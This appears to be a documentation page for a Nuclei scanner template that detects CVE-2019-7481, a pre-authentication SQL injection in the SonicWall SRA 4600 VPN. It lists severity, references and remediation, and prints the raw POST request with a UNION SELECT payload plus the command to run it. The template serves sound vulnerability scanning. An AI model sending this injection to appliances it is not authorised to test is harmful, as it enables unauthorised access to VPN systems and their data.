SonicWall SRA 4600 VPN - SQL Injection
ID: CVE-2019-7481
Severity: high
Author: _darrenmartyn
Tags: cve,cve2019,sonicwall,sqli,kev
Description
Section titled “Description”The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2019-7481
info: name: SonicWall SRA 4600 VPN - SQL Injection author: _darrenmartyn severity: high description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ - https://nvd.nist.gov/vuln/detail/CVE-2019-7481 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016 - https://github.com/Ostorlab/KEV - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 epss-score: 0.93107 epss-percentile: 0.99046 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonicwall product: sma_100_firmware tags: cve,cve2019,sonicwall,sqli,kev
http: - raw: - | POST /cgi-bin/supportInstaller HTTP/1.1 Host: {{Hostname}} Accept-Encoding: identity User-Agent: MSIE Content-Type: application/x-www-form-urlencoded
fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--
matchers: - type: word part: body words: - "4220397236"# digest: 490a004630440220297d0072d635dd82dc20eebea3bb5ef3aa34828b41277fc9e55af48439d2207302205cd0e4b0f269fe57cbae63e2e78d7b5307202e3b295d15c491c77630ae255933:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-7481.yaml"